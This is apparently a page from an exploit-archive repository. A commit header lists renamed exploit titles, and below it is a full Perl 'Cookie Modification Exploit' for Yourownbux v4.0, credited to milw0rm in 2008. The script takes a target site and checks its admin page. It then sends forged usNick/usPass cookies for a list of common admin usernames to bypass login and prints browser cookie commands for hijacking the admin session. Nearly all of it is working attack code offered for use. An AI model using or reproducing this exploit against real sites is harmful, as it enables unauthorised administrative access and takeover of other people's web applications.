477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
135 lines
2.9 KiB
Perl
Executable file
135 lines
2.9 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
use LWP::UserAgent;
|
|
use HTTP::Request;
|
|
|
|
#+-------------------------------------------------------------------------------------------------+-#
|
|
#+ Yourownbux v4.0 ------------------------------------------------------------+--+
|
|
#+ Cookie Modification Exploit -----------------------------------------------------------------++
|
|
#+ Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------++
|
|
#
|
|
#+ Dropsec.com
|
|
#
|
|
#+ Modify The Line 39, Adding More User's that can be the admin username------------+
|
|
#+
|
|
# + Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --++
|
|
#+-------------------------------------------------------------+----------------------------------------#
|
|
|
|
|
|
|
|
system("clear");
|
|
|
|
print "
|
|
# Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com
|
|
\n\n";
|
|
print "Target [ Example: www.sitedemo.com ] :\n> ";
|
|
$target = <STDIN>;
|
|
chop($target);
|
|
|
|
if($target =~ m/www\.(.*)\.(.*)/) {
|
|
|
|
$other = $1;
|
|
check1($target);
|
|
|
|
} else {
|
|
print "\nInvalid Target.";
|
|
exit();
|
|
}
|
|
|
|
sub explote {
|
|
|
|
@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");
|
|
# Add Posible Users.
|
|
|
|
$check = shift;
|
|
|
|
foreach $user (@tryusers) {
|
|
|
|
$pass = "Tec-n0x";
|
|
|
|
print "\n\tTrying > $user\n";
|
|
|
|
$browser = LWP::UserAgent->new();
|
|
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
|
|
$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");
|
|
$get = HTTP::Request->new(GET => $check);
|
|
$resp = $browser->request($get);
|
|
$content = $resp->content();
|
|
|
|
@code = split("\n",$content);
|
|
|
|
foreach $checka (@code) {
|
|
|
|
if($checka =~ m/Emails|Served|Workload|Overview/) {
|
|
|
|
system("clear");
|
|
|
|
print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:";
|
|
|
|
$vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;";
|
|
$vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;";
|
|
|
|
print "
|
|
|
|
+------------------------------------+
|
|
+ $vd\n+ $vda
|
|
+------------------------------------+
|
|
";
|
|
|
|
|
|
$yes = 1;
|
|
|
|
exit();
|
|
|
|
}
|
|
}
|
|
}
|
|
|
|
if($yes != 1) {
|
|
|
|
print "\n\n\nExploit Failed";
|
|
|
|
exit();
|
|
|
|
}
|
|
|
|
}
|
|
sub check1 {
|
|
|
|
$target = shift;
|
|
|
|
$check = "http\:\/\/$target\/admin\/index\.php";
|
|
|
|
$browser = LWP::UserAgent->new();
|
|
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
|
|
$get = HTTP::Request->new(GET => $check);
|
|
$resp = $browser->request($get);
|
|
$content = $resp->content();
|
|
|
|
@code = split("\n",$content);
|
|
|
|
foreach $checka (@code) {
|
|
|
|
if($checka =~ m/You must login as administrator to access this page/) {
|
|
|
|
print "Check 1 [ OK ]\n";
|
|
|
|
$success = 1;
|
|
|
|
explote($check);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
if($sucess != 1) {
|
|
|
|
print "Failed";
|
|
|
|
exit();
|
|
|
|
}
|
|
|
|
}
|
|
|
|
# milw0rm.com [2008-09-11]
|